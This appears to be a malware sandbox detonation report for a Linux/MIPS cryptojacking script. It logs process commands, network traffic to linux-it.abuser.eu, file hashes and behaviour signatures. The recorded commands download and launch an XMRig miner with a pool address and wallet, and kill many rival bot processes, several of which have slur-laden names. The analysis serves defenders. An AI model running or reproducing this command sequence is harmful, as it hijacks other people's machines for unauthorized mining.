[curl -O ftp://linux-it.abuser.eu/xmrig-lnx/xmrig]

/bin/sh

[sh -c pkill -9 NiGGeRD0nks69 || busybox pkill -9 NiGGeRD0nks69]

/usr/bin/pkill

[pkill -9 NiGGeRD0nks69]

/bin/busybox

[busybox pkill -9 NiGGeRD0nks69]

/bin/sh

[sh -c pkill -9 frgreu || busybox pkill -9 frgreu]

/usr/bin/pkill

[pkill -9 frgreu]

/bin/busybox

[busybox pkill -9 frgreu]

/bin/sh

[sh -c pkill -9 telnetd || busybox pkill -9 telnetd]

/usr/bin/pkill

[pkill -9 telnetd]

/bin/busybox

[busybox pkill -9 telnetd]

/bin/sh

[sh -c pkill -9 0x766f6964 || busybox pkill -9 0x766f6964]

/usr/bin/pkill

[pkill -9 0x766f6964]

/bin/busybox

[busybox pkill -9 0x766f6964]

/bin/sh

[sh -c pkill -9 NiGGeRd0nks1337 || busybox pkill -9 NiGGeRd0nks1337]

/usr/bin/pkill

[pkill -9 NiGGeRd0nks1337]

/bin/busybox

[busybox pkill -9 NiGGeRd0nks1337]

/bin/sh

[sh -c pkill -9 gaft || busybox pkill -9 gaft]

/usr/bin/pkill

[pkill -9 gaft]

/bin/busybox

[busybox pkill -9 gaft]

/bin/sh

[sh -c pkill -9 urasgbsigboa || busybox pkill -9 urasgbsigboa]

/usr/bin/pkill

[pkill -9 urasgbsigboa]

/bin/busybox

[busybox pkill -9 urasgbsigboa]

/bin/sh

[sh -c pkill -9 120i3UI49 || busybox pkill -9 120i3UI49]

/usr/bin/pkill

[pkill -9 120i3UI49]

/bin/busybox

[busybox pkill -9 120i3UI49]

/bin/sh

[sh -c pkill -9 OaF3 || busybox pkill -9 OaF3]

/usr/bin/pkill

[pkill -9 OaF3]

/bin/busybox

[busybox pkill -9 OaF3]

/bin/sh

[sh -c pkill -9 geae || busybox pkill -9 geae]

/usr/bin/pkill

[pkill -9 geae]

/bin/chmod

[chmod +x xmrig]

/bin/busybox

[busybox pkill -9 geae]

/usr/bin/nohup

[nohup ./xmrig --url gulf.moneroocean.stream:443 --user 45RjcttikAkHAhhBZiLKCZFasC98mrfJ2aJkZasQgr4hUwYkB2QPWqUZnxDuwBVjveT59ZbF2xdmVDQQYdU8EQdhVaJ7amW --pass worker819 --tls --cpu-priority=3 --asm=auto]

/tmp/xmrig

[./xmrig --url gulf.moneroocean.stream:443 --user 45RjcttikAkHAhhBZiLKCZFasC98mrfJ2aJkZasQgr4hUwYkB2QPWqUZnxDuwBVjveT59ZbF2xdmVDQQYdU8EQdhVaJ7amW --pass worker819 --tls --cpu-priority=3 --asm=auto]

/bin/sh

[/bin/sh ./xmrig --url gulf.moneroocean.stream:443 --user 45RjcttikAkHAhhBZiLKCZFasC98mrfJ2aJkZasQgr4hUwYkB2QPWqUZnxDuwBVjveT59ZbF2xdmVDQQYdU8EQdhVaJ7amW --pass worker819 --tls --cpu-priority=3 --asm=auto]

/bin/sh

[sh -c pkill -9 vaiolmao || busybox pkill -9 vaiolmao]

/usr/bin/pkill

[pkill -9 vaiolmao]

/bin/busybox

[busybox pkill -9 vaiolmao]

/bin/sh

[sh -c pkill -9 123123a || busybox pkill -9 123123a]

/usr/bin/pkill

[pkill -9 123123a]

/bin/busybox

[busybox pkill -9 123123a]

/bin/sh

[sh -c pkill -9 Ofurain0n4H34D || busybox pkill -9 Ofurain0n4H34D]

/usr/bin/pkill

[pkill -9 Ofurain0n4H34D]

/bin/busybox

[busybox pkill -9 Ofurain0n4H34D]

/bin/sh

[sh -c pkill -9 ggTrex || busybox pkill -9 ggTrex]

/usr/bin/pkill

[pkill -9 ggTrex]

/bin/busybox

[busybox pkill -9 ggTrex]

/bin/sh

[sh -c pkill -9 wasads || busybox pkill -9 wasads]

/usr/bin/pkill

[pkill -9 wasads]

/bin/busybox

[busybox pkill -9 wasads]

/bin/sh

[sh -c pkill -9 1293194hjXD || busybox pkill -9 1293194hjXD]

/usr/bin/pkill

[pkill -9 1293194hjXD]

/bin/busybox

[busybox pkill -9 1293194hjXD]

/bin/sh

[sh -c pkill -9 OthLaLosn || busybox pkill -9 OthLaLosn]

/usr/bin/pkill

[pkill -9 OthLaLosn]

/bin/busybox

[busybox pkill -9 OthLaLosn]

/bin/sh

[sh -c pkill -9 ggt || busybox pkill -9 ggt]

/usr/bin/pkill

[pkill -9 ggt]

/bin/busybox

[busybox pkill -9 ggt]

/bin/sh

[sh -c pkill -9 wget-log || busybox pkill -9 wget-log]

/usr/bin/pkill

[pkill -9 wget-log]

/bin/busybox

[busybox pkill -9 wget-log]

/bin/sh

[sh -c pkill -9 1337SoraLOADER || busybox pkill -9 1337SoraLOADER]

/usr/bin/pkill

[pkill -9 1337SoraLOADER]

/bin/busybox

[busybox pkill -9 1337SoraLOADER]

/bin/sh

[sh -c pkill -9 SAIAKINA || busybox pkill -9 SAIAKINA]

/usr/bin/pkill

[pkill -9 SAIAKINA]

/bin/busybox

[busybox pkill -9 SAIAKINA]

/bin/sh

[sh -c pkill -9 ggtq || busybox pkill -9 ggtq]

/usr/bin/pkill

[pkill -9 ggtq]

/bin/busybox

[busybox pkill -9 ggtq]

/bin/sh

[sh -c pkill -9 1378bfp919GRB1Q2 || busybox pkill -9 1378bfp919GRB1Q2]

/usr/bin/pkill

[pkill -9 1378bfp919GRB1Q2]

/bin/busybox

[busybox pkill -9 1378bfp919GRB1Q2]

/bin/sh

[sh -c pkill -9 SAIAKUSO || busybox pkill -9 SAIAKUSO]

/usr/bin/pkill

[pkill -9 SAIAKUSO]

/bin/busybox

[busybox pkill -9 SAIAKUSO]

/bin/sh

[sh -c pkill -9 ggtr || busybox pkill -9 ggtr]

/usr/bin/pkill

[pkill -9 ggtr]

/bin/busybox

[busybox pkill -9 ggtr]

/bin/sh

[sh -c pkill -9 14Fa || busybox pkill -9 14Fa]

/usr/bin/pkill

[pkill -9 14Fa]

/bin/busybox

[busybox pkill -9 14Fa]

/bin/sh

[sh -c pkill -9 SEXSLAVE1337 || busybox pkill -9 SEXSLAVE1337]

/usr/bin/pkill

[pkill -9 SEXSLAVE1337]

/bin/busybox

[busybox pkill -9 SEXSLAVE1337]

/bin/sh

[sh -c pkill -9 ggtt || busybox pkill -9 ggtt]

/usr/bin/pkill

[pkill -9 ggtt]

/bin/busybox

[busybox pkill -9 ggtt]

/bin/sh

[sh -c pkill -9 1902a3u912u3u4 || busybox pkill -9 1902a3u912u3u4]

/usr/bin/pkill

[pkill -9 1902a3u912u3u4]

/bin/busybox

[busybox pkill -9 1902a3u912u3u4]

/bin/sh

[sh -c pkill -9 SO190Ij1X || busybox pkill -9 SO190Ij1X]

/usr/bin/pkill

[pkill -9 SO190Ij1X]

/bin/busybox

[busybox pkill -9 SO190Ij1X]

/bin/sh

[sh -c pkill -9 haetrghbr || busybox pkill -9 haetrghbr]

/usr/bin/pkill

[pkill -9 haetrghbr]

/bin/busybox

[busybox pkill -9 haetrghbr]

/bin/sh

[sh -c pkill -9 19ju3d || busybox pkill -9 19ju3d]

/usr/bin/pkill

[pkill -9 19ju3d]

/bin/busybox

[busybox pkill -9 19ju3d]

/bin/sh

[sh -c pkill -9 SORAojkf120 || busybox pkill -9 SORAojkf120]

/usr/bin/pkill

[pkill -9 SORAojkf120]

/bin/busybox

[busybox pkill -9 SORAojkf120]

/bin/sh

[sh -c pkill -9 hehahejeje92 || busybox pkill -9 hehahejeje92]

/usr/bin/pkill

[pkill -9 hehahejeje92]

/bin/busybox

[busybox pkill -9 hehahejeje92]

/bin/sh

[sh -c pkill -9 2U2JDJA901F91 || busybox pkill -9 2U2JDJA901F91]

/usr/bin/pkill

[pkill -9 2U2JDJA901F91]

/bin/busybox

[busybox pkill -9 2U2JDJA901F91]

/bin/sh

[sh -c pkill -9 SlaVLav12 || busybox pkill -9 SlaVLav12]

/usr/bin/pkill

[pkill -9 SlaVLav12]

/bin/busybox

[busybox pkill -9 SlaVLav12]

/bin/sh

[sh -c pkill -9 helpmedaddthhhhh || busybox pkill -9 helpmedaddthhhhh]

/usr/bin/pkill

[pkill -9 helpmedaddthhhhh]

/bin/busybox

[busybox pkill -9 helpmedaddthhhhh]

/bin/sh

[sh -c pkill -9 2wgg9qphbq || busybox pkill -9 2wgg9qphbq]

/usr/bin/pkill

[pkill -9 2wgg9qphbq]

/bin/busybox

[busybox pkill -9 2wgg9qphbq]

/bin/sh

[sh -c pkill -9 Slav3Th3seD3vices || busybox pkill -9 Slav3Th3seD3vices]

/usr/bin/pkill

[pkill -9 Slav3Th3seD3vices]

/bin/busybox

[busybox pkill -9 Slav3Th3seD3vices]

/bin/sh

[sh -c pkill -9 hzSmYZjYMQ || busybox pkill -9 hzSmYZjYMQ]

/usr/bin/pkill

[pkill -9 hzSmYZjYMQ]

/bin/busybox

[busybox pkill -9 hzSmYZjYMQ]

/bin/sh

[sh -c pkill -9 5Gbf || busybox pkill -9 5Gbf]

/usr/bin/pkill

[pkill -9 5Gbf]

/bin/busybox

[busybox pkill -9 5Gbf]

/bin/sh

[sh -c pkill -9 SoRAxD123LOL || busybox pkill -9 SoRAxD123LOL]

/usr/bin/pkill

[pkill -9 SoRAxD123LOL]

/bin/busybox

[busybox pkill -9 SoRAxD123LOL]

/bin/sh

[sh -c pkill -9 iaGv || busybox pkill -9 iaGv]

/usr/bin/pkill

[pkill -9 iaGv]

/bin/busybox

[busybox pkill -9 iaGv]

/bin/sh

[sh -c pkill -9 5aA3 || busybox pkill -9 5aA3]

/usr/bin/pkill

[pkill -9 5aA3]

/bin/busybox

[busybox pkill -9 5aA3]

/bin/sh

[sh -c pkill -9 SoRAxD420LOL || busybox pkill -9 SoRAxD420LOL]

/usr/bin/pkill

[pkill -9 SoRAxD420LOL]

/bin/busybox

[busybox pkill -9 SoRAxD420LOL]

/bin/sh

[sh -c pkill -9 insomni || busybox pkill -9 insomni]

/usr/bin/pkill

[pkill -9 insomni]

/bin/busybox

[busybox pkill -9 insomni]

/bin/sh

[sh -c pkill -9 640277 || busybox pkill -9 640277]

/usr/bin/pkill

[pkill -9 640277]

/bin/busybox

[busybox pkill -9 640277]

/bin/sh

[sh -c pkill -9 SoraBeReppin1337 || busybox pkill -9 SoraBeReppin1337]

/usr/bin/pkill

[pkill -9 SoraBeReppin1337]

/bin/busybox

[busybox pkill -9 SoraBeReppin1337]

/bin/sh

[sh -c pkill -9 ipcamCache || busybox pkill -9 ipcamCache]

/usr/bin/pkill

[pkill -9 ipcamCache]

/bin/busybox

[busybox pkill -9 ipcamCache]

/bin/sh

[sh -c pkill -9 66tlGg9Q || busybox pkill -9 66tlGg9Q]

/usr/bin/pkill

[pkill -9 66tlGg9Q]

/bin/busybox

[busybox pkill -9 66tlGg9Q]

/bin/sh

[sh -c pkill -9 T || busybox pkill -9 T]

/usr/bin/pkill

[pkill -9 T]

/bin/busybox

[busybox pkill -9 T]

/bin/sh

[sh -c pkill -9 jUYfouyf87 || busybox pkill -9 jUYfouyf87]

/usr/bin/pkill

[pkill -9 jUYfouyf87]

/bin/busybox

[busybox pkill -9 jUYfouyf87]

/bin/sh

[sh -c pkill -9 6ke3 || busybox pkill -9 6ke3]

/usr/bin/pkill

[pkill -9 6ke3]

/bin/busybox

[busybox pkill -9 6ke3]

/bin/sh

[sh -c pkill -9 TOKYO3 || busybox pkill -9 TOKYO3]

/usr/bin/pkill

[pkill -9 TOKYO3]

/bin/busybox

[busybox pkill -9 TOKYO3]

/bin/sh

[sh -c pkill -9 lyEeaXul2dULCVxh || busybox pkill -9 lyEeaXul2dULCVxh]

/usr/bin/pkill

[pkill -9 lyEeaXul2dULCVxh]

/bin/busybox

[busybox pkill -9 lyEeaXul2dULCVxh]

/bin/sh

[sh -c pkill -9 93OfjHZ2z || busybox pkill -9 93OfjHZ2z]

/usr/bin/pkill

[pkill -9 93OfjHZ2z]

/bin/busybox

[busybox pkill -9 93OfjHZ2z]

/bin/sh

[sh -c pkill -9 TY2gD6MZvKc7KU6r || busybox pkill -9 TY2gD6MZvKc7KU6r]

/usr/bin/pkill

[pkill -9 TY2gD6MZvKc7KU6r]

/bin/busybox

[busybox pkill -9 TY2gD6MZvKc7KU6r]

/bin/sh

[sh -c pkill -9 mMkiy6f87l || busybox pkill -9 mMkiy6f87l]

/usr/bin/pkill

[pkill -9 mMkiy6f87l]

/bin/busybox

[busybox pkill -9 mMkiy6f87l]

/bin/sh

[sh -c pkill -9 A023UU4U24UIU || busybox pkill -9 A023UU4U24UIU]

/usr/bin/pkill

[pkill -9 A023UU4U24UIU]

/bin/busybox

[busybox pkill -9 A023UU4U24UIU]

/bin/sh

[sh -c pkill -9 TheWeeknd || busybox pkill -9 TheWeeknd]

/usr/bin/pkill

[pkill -9 TheWeeknd]

/bin/busybox

[busybox pkill -9 TheWeeknd]

/bin/sh

[sh -c pkill -9 mioribitches || busybox pkill -9 mioribitches]

/usr/bin/pkill

[pkill -9 mioribitches]

/bin/busybox

[busybox pkill -9 mioribitches]

/bin/sh

[sh -c pkill -9 A5p9 || busybox pkill -9 A5p9]

/usr/bin/pkill

[pkill -9 A5p9]

/bin/busybox

[busybox pkill -9 A5p9]

/bin/sh

[sh -c pkill -9 TheWeeknds || busybox pkill -9 TheWeeknds]

/usr/bin/pkill

[pkill -9 TheWeeknds]

/bin/busybox

[busybox pkill -9 TheWeeknds]

/bin/sh

[sh -c pkill -9 mnblkjpoi || busybox pkill -9 mnblkjpoi]

/usr/bin/pkill

[pkill -9 mnblkjpoi]

/bin/busybox

[busybox pkill -9 mnblkjpoi]

/bin/sh

[sh -c pkill -9 AbAd || busybox pkill -9 AbAd]

/usr/bin/pkill

[pkill -9 AbAd]

/bin/busybox

[busybox pkill -9 AbAd]

/bin/sh

[sh -c pkill -9 Tokyos || busybox pkill -9 Tokyos]

/usr/bin/pkill

[pkill -9 Tokyos]

/bin/busybox

[busybox pkill -9 Tokyos]

/bin/sh

[sh -c pkill -9 neb || busybox pkill -9 neb]

/usr/bin/pkill

[pkill -9 neb]

/bin/busybox

[busybox pkill -9 neb]

/bin/sh

[sh -c pkill -9 Akiru || busybox pkill -9 Akiru]

/usr/bin/pkill

[pkill -9 Akiru]

/bin/busybox

[busybox pkill -9 Akiru]

/bin/sh

[sh -c pkill -9 U8inTz || busybox pkill -9 U8inTz]

/usr/bin/pkill

[pkill -9 U8inTz]

/bin/busybox

[busybox pkill -9 U8inTz]

/bin/sh

[sh -c pkill -9 netstats || busybox pkill -9 netstats]

/usr/bin/pkill

[pkill -9 netstats]

/bin/busybox

[busybox pkill -9 netstats]

/bin/sh

[sh -c pkill -9 Alex || busybox pkill -9 Alex]

/usr/bin/pkill

[pkill -9 Alex]

/bin/busybox

[busybox pkill -9 Alex]

/bin/sh

[sh -c pkill -9 W9RCAKM20T || busybox pkill -9 W9RCAKM20T]

/usr/bin/pkill

[pkill -9 W9RCAKM20T]

/bin/busybox

[busybox pkill -9 W9RCAKM20T]

/bin/sh

[sh -c pkill -9 newnetword || busybox pkill -9 newnetword]

/usr/bin/pkill

[pkill -9 newnetword]

/bin/busybox

[busybox pkill -9 newnetword]

/bin/sh

[sh -c pkill -9 Ayo215 || busybox pkill -9 Ayo215]

/usr/bin/pkill

[pkill -9 Ayo215]

/bin/busybox

[busybox pkill -9 Ayo215]

/bin/sh

[sh -c pkill -9 Word || busybox pkill -9 Word]

/usr/bin/pkill

[pkill -9 Word]

/bin/busybox

[busybox pkill -9 Word]

/bin/sh

[sh -c pkill -9 nloads || busybox pkill -9 nloads]

/usr/bin/pkill

[pkill -9 nloads]

/bin/busybox

[busybox pkill -9 nloads]

/bin/sh

[sh -c pkill -9 BAdAsV || busybox pkill -9 BAdAsV]

/usr/bin/pkill

[pkill -9 BAdAsV]

/bin/busybox

[busybox pkill -9 BAdAsV]

/bin/sh

[sh -c pkill -9 Wordmane || busybox pkill -9 Wordmane]

/usr/bin/pkill

[pkill -9 Wordmane]

/bin/busybox

[busybox pkill -9 Wordmane]

/bin/sh

[sh -c pkill -9 notyakuzaa || busybox pkill -9 notyakuzaa]

/usr/bin/pkill

[pkill -9 notyakuzaa]

/bin/busybox

[busybox pkill -9 notyakuzaa]

/bin/sh

[sh -c pkill -9 Belch || busybox pkill -9 Belch]

/usr/bin/pkill

[pkill -9 Belch]

/bin/busybox

[busybox pkill -9 Belch]

/bin/sh

[sh -c pkill -9 Wordnets || busybox pkill -9 Wordnets]

/usr/bin/pkill

[pkill -9 Wordnets]

/bin/busybox

[busybox pkill -9 Wordnets]

/bin/sh

[sh -c pkill -9 obp || busybox pkill -9 obp]

/usr/bin/pkill

[pkill -9 obp]

/bin/busybox

[busybox pkill -9 obp]

/bin/sh

[sh -c pkill -9 BigN0gg0r420 || busybox pkill -9 BigN0gg0r420]

/usr/bin/pkill

[pkill -9 BigN0gg0r420]

/bin/busybox

[busybox pkill -9 BigN0gg0r420]

/bin/sh

[sh -c pkill -9 X0102I34f || busybox pkill -9 X0102I34f]

/usr/bin/pkill

[pkill -9 X0102I34f]

/bin/busybox

[busybox pkill -9 X0102I34f]

/bin/sh

[sh -c pkill -9 ofhasfhiafhoi || busybox pkill -9 ofhasfhiafhoi]

/usr/bin/pkill

[pkill -9 ofhasfhiafhoi]

/bin/busybox

[busybox pkill -9 ofhasfhiafhoi]

/bin/sh

[sh -c pkill -9 BzSxLxBxeY || busybox pkill -9 BzSxLxBxeY]

/usr/bin/pkill

[pkill -9 BzSxLxBxeY]

/bin/busybox

[busybox pkill -9 BzSxLxBxeY]

/bin/sh

[sh -c pkill -9 X19I239124UIU || busybox pkill -9 X19I239124UIU]

/usr/bin/pkill

[pkill -9 X19I239124UIU]

/bin/busybox

[busybox pkill -9 X19I239124UIU]

/bin/sh

[sh -c pkill -9 oism || busybox pkill -9 oism]

/usr/bin/pkill

[pkill -9 oism]

/bin/busybox

[busybox pkill -9 oism]

/bin/sh

[sh -c pkill -9 Deported || busybox pkill -9 Deported]

/usr/bin/pkill

[pkill -9 Deported]

/bin/busybox

[busybox pkill -9 Deported]

/bin/sh

[sh -c pkill -9 XSHJEHHEIIHWO || busybox pkill -9 XSHJEHHEIIHWO]

/usr/bin/pkill

[pkill -9 XSHJEHHEIIHWO]

/bin/busybox

[busybox pkill -9 XSHJEHHEIIHWO]

/bin/sh

[sh -c pkill -9 olsVNwo12 || busybox pkill -9 olsVNwo12]

/usr/bin/pkill

[pkill -9 olsVNwo12]

/bin/busybox

[busybox pkill -9 olsVNwo12]

/bin/sh

[sh -c pkill -9 DeportedDeported || busybox pkill -9 DeportedDeported]

/usr/bin/pkill

[pkill -9 DeportedDeported]

/bin/busybox

[busybox pkill -9 DeportedDeported]

/bin/sh

[sh -c pkill -9 XkTer0GbA1 || busybox pkill -9 XkTer0GbA1]

/usr/bin/pkill

[pkill -9 XkTer0GbA1]

/bin/busybox

[busybox pkill -9 XkTer0GbA1]

/bin/sh

[sh -c pkill -9 onry0v03 || busybox pkill -9 onry0v03]

/usr/bin/pkill

[pkill -9 onry0v03]

/bin/busybox

[busybox pkill -9 onry0v03]

/bin/sh

[sh -c pkill -9 FortniteDownLOLZ || busybox pkill -9 FortniteDownLOLZ]

/usr/bin/pkill

[pkill -9 FortniteDownLOLZ]

/bin/busybox

[busybox pkill -9 FortniteDownLOLZ]

/bin/sh

[sh -c pkill -9 Y0urM0mGay || busybox pkill -9 Y0urM0mGay]

/usr/bin/pkill

[pkill -9 Y0urM0mGay]

/bin/busybox

[busybox pkill -9 Y0urM0mGay]

/bin/sh

[sh -c pkill -9 pussyfartlmaojk || busybox pkill -9 pussyfartlmaojk]

/usr/bin/pkill

[pkill -9 pussyfartlmaojk]

/bin/busybox

[busybox pkill -9 pussyfartlmaojk]

/bin/sh

[sh -c pkill -9 GrAcEnIgGeRaNn || busybox pkill -9 GrAcEnIgGeRaNn]

/usr/bin/pkill

[pkill -9 GrAcEnIgGeRaNn]

/bin/busybox

[busybox pkill -9 GrAcEnIgGeRaNn]

/bin/sh

[sh -c pkill -9 YvdGkqndCO || busybox pkill -9 YvdGkqndCO]

/usr/bin/pkill

[pkill -9 YvdGkqndCO]

/bin/busybox

[busybox pkill -9 YvdGkqndCO]

Network

Country Destination Domain Proto
US 1.1.1.1:53 linux-it.abuser.eu udp
IT 95.234.158.87:80 linux-it.abuser.eu tcp
IT 95.234.158.87:6780 linux-it.abuser.eu tcp
US 1.1.1.1:53 linux-it.abuser.eu udp
IT 95.234.158.87:80 linux-it.abuser.eu tcp
US 1.1.1.1:53 linux-it.abuser.eu udp
IT 95.234.158.87:80 linux-it.abuser.eu tcp
IT 95.234.158.87:6780 linux-it.abuser.eu tcp
US 1.1.1.1:53 linux-it.abuser.eu udp
IT 95.234.158.87:80 linux-it.abuser.eu tcp
US 1.1.1.1:53 linux-it.abuser.eu udp
IT 95.234.158.87:80 linux-it.abuser.eu tcp
IT 95.234.158.87:6780 linux-it.abuser.eu tcp
US 1.1.1.1:53 linux-it.abuser.eu udp
IT 95.234.158.87:80 linux-it.abuser.eu tcp
US 1.1.1.1:53 linux-it.abuser.eu udp
IT 95.234.158.87:80 linux-it.abuser.eu tcp
US 1.1.1.1:53 linux-it.abuser.eu udp
IT 95.234.158.87:80 linux-it.abuser.eu tcp
IT 95.234.158.87:6780 linux-it.abuser.eu tcp
US 1.1.1.1:53 linux-it.abuser.eu udp
IT 95.234.158.87:80 linux-it.abuser.eu tcp
US 1.1.1.1:53 linux-it.abuser.eu udp
IT 95.234.158.87:6780 linux-it.abuser.eu tcp
IT 95.234.158.87:80 linux-it.abuser.eu tcp
US 1.1.1.1:53 linux-it.abuser.eu udp
IT 95.234.158.87:80 linux-it.abuser.eu tcp
US 1.1.1.1:53 linux-it.abuser.eu udp
IT 95.234.158.87:80 linux-it.abuser.eu tcp
IT 95.234.158.87:6780 linux-it.abuser.eu tcp
US 1.1.1.1:53 linux-it.abuser.eu udp
IT 95.234.158.87:80 linux-it.abuser.eu tcp
US 1.1.1.1:53 linux-it.abuser.eu udp
IT 95.234.158.87:80 linux-it.abuser.eu tcp
US 1.1.1.1:53 linux-it.abuser.eu udp
IT 95.234.158.87:21 linux-it.abuser.eu tcp
IT 95.234.158.87:10496 linux-it.abuser.eu tcp
IT 95.234.158.87:6780 linux-it.abuser.eu tcp
IT 95.234.158.87:6780 linux-it.abuser.eu tcp
IT 95.234.158.87:6780 linux-it.abuser.eu tcp
IT 95.234.158.87:6780 linux-it.abuser.eu tcp
IT 95.234.158.87:6780 linux-it.abuser.eu tcp
IT 95.234.158.87:6780 linux-it.abuser.eu tcp
IT 95.234.158.87:6780 linux-it.abuser.eu tcp
IT 95.234.158.87:6780 linux-it.abuser.eu tcp
IT 95.234.158.87:6780 linux-it.abuser.eu tcp
IT 95.234.158.87:6780 linux-it.abuser.eu tcp
IT 95.234.158.87:6780 linux-it.abuser.eu tcp
IT 95.234.158.87:6780 linux-it.abuser.eu tcp
IT 95.234.158.87:6780 linux-it.abuser.eu tcp
IT 95.234.158.87:6780 linux-it.abuser.eu tcp
IT 95.234.158.87:6780 linux-it.abuser.eu tcp
IT 95.234.158.87:6780 linux-it.abuser.eu tcp
IT 95.234.158.87:6780 linux-it.abuser.eu tcp
IT 95.234.158.87:6780 linux-it.abuser.eu tcp
IT 95.234.158.87:6780 linux-it.abuser.eu tcp

Files

/tmp/yakuza.mips

MD5 371732a722f576ce663cf832412521a8
SHA1 7d8f25bfc26af545c568ffc5c0afe8c4cd35de40
SHA256 11bd15eeca11f8fcb46cce41f4387505027446b5ba8774d2b7bd759bcdb1b9d0
SHA512 c2174eeaf058a5d78d2bb7e417373c56d5b407072de68aaae33c690fd14b93a033ef4aeb18f9a364541e51b6cfc0a28c93efbb4a1857a15b875d420e9886c014

/tmp/xmrig

MD5 8f4fff0ded94f1141768220906abfbb8
SHA1 ea7c97294f415dc8713ac8c280b3123da62f6e56
SHA256 b0e1ae6d73d656b203514f498b59cbcf29f067edf6fbd3803a3de7d21960848d
SHA512 0096072a1482f8e7999867baa3dd6e96d51591e9f7645c9ff276b53984957025c83e1fe52e5c4f55639eeed2bdbd80bbd57d7dacd84468ce09c834e39dfc4bee

Analysis: behavioral4

Detonation Overview

Submitted

2024-11-24 00:00

Reported

2024-11-24 00:03

Platform

debian9-mipsel-20240611-en

Max time kernel

145s

Max time network

147s

Command Line

[/tmp/yak.sh]

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Xmrig family

xmrig

Xmrig_linux family

xmrig_linux

xmrig

miner xmrig

File and Directory Permissions Modification

defense_evasion
Description Indicator Process Target
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/yakuza.mips /tmp/yakuza.mips N/A
N/A /tmp/xmrig /tmp/xmrig N/A

Enumerates running processes

Reads CPU attributes

discovery
Description Indicator Process Target
File opened for reading /sys/devices/system/cpu/online /usr/bin/pkill N/A
File opened for reading /sys/devices/system/cpu/online /usr/bin/pkill N/A
File opened for reading /sys/devices/system/cpu/online /usr/bin/pkill N/A
File opened for reading /sys/devices/system/cpu/online /usr/bin/pkill N/A
File opened for reading /sys/devices/system/cpu/online /usr/bin/pkill N/A
File opened for reading /sys/devices/system/cpu/online /usr/bin/pkill N/A
File opened for reading /sys/devices/system/cpu/online /usr/bin/pkill N/A
File opened for reading /sys/devices/system/cpu/online /usr/bin/pkill N/A
File opened for reading /sys/devices/system/cpu/online /usr/bin/pkill N/A
File opened for reading /sys/devices/system/cpu/online /usr/bin/pkill N/A
File opened for reading /sys/devices/system/cpu/online /usr/bin/pkill N/A
File opened for reading /sys/devices/system/cpu/online /usr/bin/pkill N/A
File opened for reading /sys/devices/system/cpu/online /usr/bin/pkill N/A
File opened for reading /sys/devices/system/cpu/online /usr/bin/pkill N/A
File opened for reading /sys/devices/system/cpu/online /usr/bin/pkill N/A
File opened for reading /sys/devices/system/cpu/online /usr/bin/pkill N/A
File opened for reading /sys/devices/system/cpu/online /usr/bin/pkill N/A
File opened for reading /sys/devices/system/cpu/online /usr/bin/pkill N/A
File opened for reading /sys/devices/system/cpu/online /bin/ps N/A
File opened for reading /sys/devices/system/cpu/online /usr/bin/pkill N/A
File opened for reading /sys/devices/system/cpu/online /usr/bin/pkill N/A
File opened for reading /sys/devices/system/cpu/online /usr/bin/pkill N/A
File opened for reading /sys/devices/system/cpu/online /usr/bin/pkill N/A
File opened for reading /sys/devices/system/cpu/online /usr/bin/pkill N/A
File opened for reading /sys/devices/system/cpu/online /usr/bin/pkill N/A
File opened for reading /sys/devices/system/cpu/online /usr/bin/pkill N/A
File opened for reading /sys/devices/system/cpu/online /usr/bin/pkill N/A
File opened for reading /sys/devices/system/cpu/online /usr/bin/pkill N/A
File opened for reading /sys/devices/system/cpu/online /usr/bin/pkill N/A
File opened for reading /sys/devices/system/cpu/online /usr/bin/pkill N/A
File opened for reading /sys/devices/system/cpu/online /usr/bin/pkill N/A
File opened for reading /sys/devices/system/cpu/online /usr/bin/pkill N/A
File opened for reading /sys/devices/system/cpu/online /usr/bin/pkill N/A
File opened for reading /sys/devices/system/cpu/online /usr/bin/pkill N/A
File opened for reading /sys/devices/system/cpu/online /usr/bin/pkill N/A
File opened for reading /sys/devices/system/cpu/online /usr/bin/pkill N/A
File opened for reading /sys/devices/system/cpu/online /usr/bin/pkill N/A
File opened for reading /sys/devices/system/cpu/online /usr/bin/pkill N/A
File opened for reading /sys/devices/system/cpu/online /usr/bin/pkill N/A
File opened for reading /sys/devices/system/cpu/online /usr/bin/pkill N/A
File opened for reading /sys/devices/system/cpu/online /usr/bin/pkill N/A
File opened for reading /sys/devices/system/cpu/online /usr/bin/pkill N/A
File opened for reading /sys/devices/system/cpu/online /usr/bin/pkill N/A
File opened for reading /sys/devices/system/cpu/online /usr/bin/pkill N/A
File opened for reading /sys/devices/system/cpu/online /usr/bin/pkill N/A
File opened for reading /sys/devices/system/cpu/online /usr/bin/pkill N/A
File opened for reading /sys/devices/system/cpu/online /usr/bin/pkill N/A
File opened for reading /sys/devices/system/cpu/online /usr/bin/pkill N/A
File opened for reading /sys/devices/system/cpu/online /usr/bin/pkill N/A
File opened for reading /sys/devices/system/cpu/online /usr/bin/pkill N/A
File opened for reading /sys/devices/system/cpu/online /usr/bin/pkill N/A
File opened for reading /sys/devices/system/cpu/online /usr/bin/pkill N/A
File opened for reading /sys/devices/system/cpu/online /usr/bin/pkill N/A
File opened for reading /sys/devices/system/cpu/online /usr/bin/pkill N/A
File opened for reading /sys/devices/system/cpu/online /usr/bin/pkill N/A
File opened for reading /sys/devices/system/cpu/online /usr/bin/pkill N/A
File opened for reading /sys/devices/system/cpu/online /usr/bin/pkill N/A
File opened for reading /sys/devices/system/cpu/online /usr/bin/pkill N/A
File opened for reading /sys/devices/system/cpu/online /usr/bin/pkill N/A
File opened for reading /sys/devices/system/cpu/online /usr/bin/pkill N/A
File opened for reading /sys/devices/system/cpu/online /usr/bin/pkill N/A
File opened for reading /sys/devices/system/cpu/online /usr/bin/pkill N/A
File opened for reading /sys/devices/system/cpu/online /usr/bin/pkill N/A
File opened for reading /sys/devices/system/cpu/online /usr/bin/pkill N/A

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/22/status /usr/bin/pkill N/A
File opened for reading /proc/329/status /usr/bin/pkill N/A
File opened for reading /proc/3/cmdline /usr/bin/pkill N/A
